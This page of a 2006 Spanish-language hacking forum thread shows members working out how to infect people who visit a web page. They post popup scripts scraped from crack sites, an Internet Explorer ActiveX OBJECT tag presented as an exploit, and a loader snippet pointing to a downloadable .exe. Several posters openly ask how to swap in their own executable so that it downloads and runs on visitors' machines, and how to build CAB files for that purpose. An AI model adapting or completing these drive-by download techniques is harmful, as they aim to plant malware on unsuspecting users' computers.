Páginas: 1 2 [3] 4 5 
|
 |
|
 Autor
|
Tema: Infecion visitando pagina web (Leído 7738 veces)
|
sSchneider
 Desconectado
Mensajes: 8
|
mmm entonces como puedo generar el "classid" de mi CAB ....
|
|
|
|
|
En línea
|
|
|
|
|
|
^DeMoN^
Desconectado
Mensajes: 390
A la Droga Dile NO...Me dejes nunca.
|
esa crack.am al descargar un crack me hace el ruido del Kaspersky wiiiii xD exploit no se que era ahora no se todavia pero cuando instale el Kaspersky me fijo.
|
|
|
|
|
En línea
|
Ustedes controlan nuestras vidas, nosotros sus sistemas. |
|
|
Kizar
Desconectado
Mensajes: 1.320
kizar_net
|
www.crack.amPOPUP ALEATORIOEste scrip muesta un popup aleatorio, puede mostrar: http://216.65.38.226./torrent.html http://www.fuck-portal.comfunction setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
document.cookie = curCookie;
}
function getCookie(Name) {
var search = Name + "=";
if (document.cookie.length > 0)
{ // if there are any cookies
offset = document.cookie.indexOf(search);
if (offset != -1) { // if cookie exists
offset += search.length; // set index of beginning of value
end = document.cookie.indexOf(";", offset); // set index of end of cookie value
if (end == -1)
end = document.cookie.length;
return unescape(document.cookie.substring(offset, end)); }
}}
function register(name,value) {
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 60*60*24);
setCookie(name,value, expires,'/','');
}
var popups= new Array();
popups[0]='http://216.65.38.226./torrent.html';
popups[1]='http://www.fuck-portal.com';
pick=Math.floor(Math.random()*popups.length)+1;
var picked=0;
//check if all popups have already been displayed
var alldisp=1;
for (i=1; i <= popups.length; i++){
if (getCookie ("pop" + i) != 1) {alldisp=0;}
}
if (alldisp ==0){
while (picked==0){
for (i=1; i <= popups.length; i++){
if (pick == i && getCookie ("pop"+i) != 1){
window.open (popups[i-1],'freexxx');
register ("pop" + pick,"1");
picked=1;
} // if
} // for
pick=Math.floor(Math.random()*popups.length)+1;
} // while
} //if
else {
window.open (popups [pick-1],'freexxx');
for (i=1; i <= popups.length; i++){register ("pop" + i,"0");}
} //else
window.focus();
PD: el popup funciona en firefox y el algunas versiondes de IE. EXPLOIT DEL CABTambien e encontrado el exploit del que hablamos antes: <OBJECT id=x height=1 width=1 align=middle classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></OBJECT> Pero no se como hacer para implementarlo... si alguien lo explica.... INTENTA ABRIR OTRO POPUP<SCRIPT>
function shellscript()
{
showModalDialog("http://www.fuck-portal.com","_blank","dialogHeight: 1024; dialogWidth: 768; dialogTop: 10px; dialogLeft: 10px; edge: Raised; center: Yes; help: Yes; resizable: Yes; status: Yes;");
}
</SCRIPT> Este a mi no me a funcionado en ningun navegador, siempre me lo a blockeado.... NO e visto mas cosas sino ya lo posteare. Salu2
|
|
|
|
« Última modificación: 12 Abril 2006, 15:27 por KiZaR »
|
En línea
|
|
|
|
Kizar
Desconectado
Mensajes: 1.320
kizar_net
|
Como se me a podido olvidar, la cima de el malware, esta pagina tiene sus propios exploits que compra para su uso y disfrute.
AstalavistaCuando pueda publico cosillas, mirar el code fuente de la pagina. SI a alguien le interesa puede ir mirando esto que esta sacao de esa pag:http://kona.kontera.com/javascript/lib/KonaLibInline.jshttp://content.bannerconnect.net/rmtag3.jshttp://servedby.precisionclick.com/midas/?src=pub&site=1005&adfmt=2&ccb=1542http://pub.oxado.com/insert_ad?pub=12750http://4.adbrite.com/mb/text_group.php?sid=89708&br=1&dk=726567697374657220646f6d61696e5f355f33http://3.adbrite.com/mb/text_group.php?sid=22620&newwin=1&br=1http://banners.passion.com/piclist?site=passion&race=4&page=search&width=1&photo=2&display=vertical&title_color=%23800000&target=_blank&size=3&pid=g767381-pct&thumb=bigthumb&override=1&models=1POPUP<script language=javascript><!--
var myURL='http://www.estelle.tv/potd/';
var myWidth='800';
var myHeight='600';
var myMinTimeOut='60'; // specified in minutes
var myCookieChk='yes'; // yes(check if cookies enabled) or no
var dz=document;
var dt=new Date();
var xm=dt.getMonth();
if(xm<10){
xm='0'+xm;
}
var xd=dt.getDate();
if(xd<10){
xd='0'+xd
}
var h=dt.getHours();
if(h<10){
h='0'+h
}
var xmin=dt.getMinutes();
if(xmin<10){
xmin='0'+xmin;
}
var sp=xm+xd+h+xmin;
var cck=myCookieChk;
var pop;
if(cck=='yes'){
dz.cookie='h2=o;path=/;';
}
var ck=dz.cookie;
var idx1=ck.indexOf('93rx7');
var idx2=ck.indexOf('oatmeal_ck');
var osp=ck.substr(idx1+5,idx2-idx1-5);
if(sp-osp>=myMinTimeOut&&(cck=='no'||(cck=='yes'&&ck.indexOf('2=o')>0))){
dt.setTime(dt.getTime()+(myMinTimeOut*60*1000));
dz.cookie='buddy=93rx7'+sp+'oatmeal_ck; path=/; expires='+ dt.toGMTString();
fastClickpopWindow();
}
function fastClickpopWindow(){
pop='width='+myWidth+',height='+myHeight+',titlebar=1,toolbar=1,location=1,';
pop+='menubar=1,scrollbars=1,resizable=1,channelmode=0,directories=0,status=1';
if(parseFloat(navigator.appVersion)>=4){
var myTI=screen.height/2-myHeight/2;
var myLI=screen.width/2-myWidth/2;pop+=',top='+myTI+',left='+myLI;
}
var xwin=window.open("",'cool', pop, true);
xwin.blur();
xwin.location=myURL;
xwin.blur();
} // -->
</script> Salu2 |
|
|
|
« Última modificación: 12 Abril 2006, 16:48 por KiZaR »
|
En línea
|
|
|
|
cacolo
Desconectado
Mensajes: 154
Motocross RiDer! / Registrado : 06 Abril 2006
|
Bueno me e leio todo el post, ya k me interesa y me gustaria ayudar y aprender tmb.. Pero no tengo mucha idea, Podrian decir que puedo hacer como para ayudar ? Me interesa muchisimo yo tengo codecs k me paso un amigo pero dijo kizar k eran viejos asi k bue xD, abra k buscar algo nuevo y ver k van bien, pero ya encontraron lo que buscaban o siguen buscando ? osea algun codec k haga kse auto ejecute y baje un exe a la pc del k abra la web.
|
|
|
|
|
En línea
|
|
|
|
Kizar
Desconectado
Mensajes: 1.320
kizar_net
|
|
|
|
|
|
En línea
|
|
|
|
cacolo
Desconectado
Mensajes: 154
Motocross RiDer! / Registrado : 06 Abril 2006
|
como e dicho soy nuevo y La verdad no la tengo clara, pero viendo con lo poco k se Supongo que donde dice en el otro post. Y empieza la descarga de el objeto CAB:
http://www.azebar.com/install/ azesearch.cab Si yo remplazo ese link por el link d mi *.exe Funcionaria ? o esto es lo k kieren descifrar sobre el .cab ? Si funciona con el link d mi exe, Que mas hay k editar aparte d cambiar esos links, lo de k te verifica k si tienes sp2 Eso es mejor dejarlo ya k esta echo igual k con lo del flash no ? Capaz sean estupidas mis pregunta y pregunta "Pero coño es obio k lo tienes k cambiar" o cosas como esa.. pero bueno si es mucho spam mi post, borrenlo y diganme x privado o msn, pero me gustaria aprender y asi editar o saber para k sirven bien. |
|
|
|
|
En línea
|
|
|
|
Kizar
Desconectado
Mensajes: 1.320
kizar_net
|
Esto lo tendrias que cambiar por la ruta de tu cab, pero e estado mirando y no e econtrado ningun programa "bueno" para editar ese tipo de archivos.... |
|
|
|
|
En línea
|
|
|
|
cacolo
Desconectado
Mensajes: 154
Motocross RiDer! / Registrado : 06 Abril 2006
|
Esta bien y leyendo el post k hizo Man-In-the-Middle no me entienden!! , en el primero ejemplo se puede executar exe creo k trato d decir en el primer ejemplo k pones tu en la primera Se funciona pa exe ? // JavaScript Document
<!--
var sp2 = (navigator.appName == 'Microsoft Internet Explorer' && navigator.userAgent.indexOf("SV1") != -1);
var flag=0;
var loadfirst=1;
var isttrack = sp2 ? 'flash' : 'normal';
var ibarurl='http://promo.dollarrevenue.com/';
var ibarfile='http://promo.dollarrevenue.com/webmasterexe/drsmartload618a.exe';
var ibarprompt='Click to Download and Run';
var holder;
var istreferer='';
var adExpiration2='';
var currentDate2 = new Date(); Dps sigue el codec.... cambiando este link k dices? ibarfile='http://promo.dollarrevenue.com/webmasterexe/drsmartload618a.exe'; Edited: Que boludo.. no vi k decia "clikc to download and run" Seguro k sera algun tipo d propaganda.. dnd dice k si kieres bajr eso del dolar y se t baja eso.. :S |
|
|
|
« Última modificación: 13 Abril 2006, 03:07 por cacolo »
|
En línea
|
|
|
|
sSchneider
Desconectado
Mensajes: 8
|
miren pa poder crear archivon CAB podemos hacerlo
abrimos nuestra consola Inicio/ejecutar/CMD
y COLOKAMOS ESTE COMANDO "iexpress" conesto crearemos nuestro CAB
WIN Xp
bueno pero eso no es todo hayq ue saber el
"CLSID:********-*****-*****-***-*** "
y el ID ..... Mu gustarian que hablen mas del tem para poder crear nuestro scrit... nose con que clase de herramienta podemso generar T_T¡¡
|
|
|
|
|
En línea
|
|
|
|
cacolo
Desconectado
Mensajes: 154
Motocross RiDer! / Registrado : 06 Abril 2006
|
bumpeo el post pq no quiero k ser pierda, ya k subieron muchos posts viejos y este kedo en la 2ª pag.
|
|
|
|
|
En línea
|
|
|
|
|
Hendrix
|
A Crazy idea: Las paginas usan cookies en el PC del user, no??? creo que son extension .txt, y los exploradores no les ponen ninguna pega. Si en lugar de pasarle cookies le pasamos un .exe pasado a .txt kreo que el explorador se lo va a tragar (no l ose, no lo e probado, es solo una idea). Pues si se konsigue pasar eso, luego es facil ejekutar komandos del CMD (si estan parcheadas esas acciones posteen, asi me evito tiempo...  ). Pues haciendo un simple start virus.txt se ejekutaria el virus.exe (ya que el CMD no ejekuta por extensiones). De lo que no estoy seguro es lo de la CMD, de lo otro no le veo problema.... Weno, ya m diran que les parece. Salu2 Hendrix |
|
|
|
|
En línea
|
Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer |
|
|
el_cantante
Desconectado
Mensajes: 61
|
Aca les dejo un pequeño analisis de keygen.us, que me parecio bastante interesante... Todavia me falta terminarlo, cuando me haga de un poco de tiempo lo termino. Vale aclarar que es solo una recopilacion de los codigos fuente y lo que encontre dentro esta web, pero me parecio interesante tener en cuenta este sitio tambien... http://www.geocities.com/zetta122000/ANALISISDEKEYGEN.US.txtSaludos!  |
|
|
|
|
En línea
|
El sistema del zapping mental en su apogeo, donde las horas pasan con la velocidad de la vida. No es el mismo domingo del principio, es un domingo anterior, otra temporada en el infierno, siete dias atras.
|
|
|
sSchneider
Desconectado
Mensajes: 8
|
alguien a podido crear algun ejemplo igual coo el que esta en la pagina de www.azebar.com pero con otros archvios?'?? |
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 2 [3] 4 5 
|
|
|
 |
